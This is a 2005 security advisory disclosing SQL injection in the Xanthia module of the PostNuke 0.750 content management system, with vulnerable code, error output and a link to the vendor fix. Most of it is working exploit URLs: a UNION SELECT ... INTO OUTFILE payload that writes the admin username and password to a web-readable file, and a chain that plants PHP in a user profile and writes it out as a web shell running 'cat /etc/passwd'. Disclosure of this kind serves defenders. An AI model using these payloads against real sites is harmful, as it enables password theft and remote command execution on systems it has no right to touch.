-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [PostNuke SQL Injection 0.750=>x cXIb8O3.5] Author: cXIb8O3 Date: 2.3.2005 from SecurityReason.Com - --- 0.Description --- PostNuke: The Phoenix Release (0.750) PostNuke is an open source, open developement content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke Or at the Community Forums located at: http://forums.postnuke.com/ - --- 1. Sql Injection --- This sql injection exist in modules/Xanthia/pnclasses/Xanthia.php on line 977 on function init_template() Vulnerabilities code: - -965-980--- $sql = "SELECT $blcontrolcolumn[blocktemplate] as blocktemplate, $blcontrolcolumn[identi] as identi FROM $pntable[theme_blcontrol] WHERE $blcontrolcolumn[theme]='$theme' AND $blcontrolcolumn[module]='$mod' AND $blcontrolcolumn[blocktemplate] !=''"; // Execute the query $result =& $dbconn->Execute($sql); $blocktemplates = array(); while(!$result->EOF) { $row = $result->GetRowAssoc(false); $blocktemplates[] = $row; $result->MoveNext(); } - -965-980--- Error exists in varible $mod =>(GET) name. But you don't can see result.. Error: If you are user right and have you function init_template() active go to: http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index Error message : - --------------- Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977 - --------------- OR http://[HOST]/[DIR]/modules.php?op=modload&name=sp3x&file=index&module='cXIb8O3 Error message : - --------------- Fatal error: Call to a member function MoveNext() on a non-object in /www/PostNuke-0.750/html/modules/Xanthia/pnclasses/Xanthia.php on line 977 - --------------- Ok. Frist exploit. Exploit 0[GET Admin Pass] Chech dir for PostNuke. http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index Error message : - --------------- Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977 - --------------- For exemple prefix is /www/PostNuke-0.750/source/html/. Now you can make exploit. But you have to know db prefix. http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_uname,pn_pass%20FROM%20[db_prefix]users%20WHERE%20pn_uid=2%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3'/*&type=admin&func=view and error messege is: Error message : - --------------- Failed to load module Xanthia' UNION SELECT pn_uname,pn_pass FROM pn__users WHERE pn_uid=2 INTO OUTFILE '/www/PostNuke-0.750/source/html/pnTemp/Xanthia_cache/cXIb8O3'/* (at function: "view") - --------------- But go now to http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3 and have you password for user with id=2. Exploit1[Blind upload] Go to: http://[HOST]/[DIR]/user.php?op=edituser and insert to "Extra information" php code. For exemeple: - --- - --- And now you can make php script with this code. For exemple: http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_bio,pn_uname%20FROM%20[db_prefix]users%20WHERE%20pn_uid=[YOUR_ID]%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3.php'/*&type=admin&func=view and go to: http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cXIb8O3=cat /etc/passwd - --- 2. How to fix --- PNSA 2005-2 Security Fix (changed files only) for PostNuke 0.750 (tar.gz format) http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html SHA1: 6e76d92124c833618d02dfdb87d699374120967d MD5: a007e741be11389a986b1d8928a6c0e5 Size: 160550 Bytes or CVS - --- 3. Greets --- sp3x - --- 4.Contact --- Author: Maksymilian Arciemowicz Email: max [at] jestsuper [dot] pl GPG-KEY: http://securityreason.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.6 (FreeBSD) iD8DBQFCjunXznmvyJCR4zQRAjFkAJ4lDoD/zYP3lFZD07XsR9WyftT7vACgjRPr oAXlzjom7BH7yzDRybeHjDM= =RlgM -----END PGP SIGNATURE-----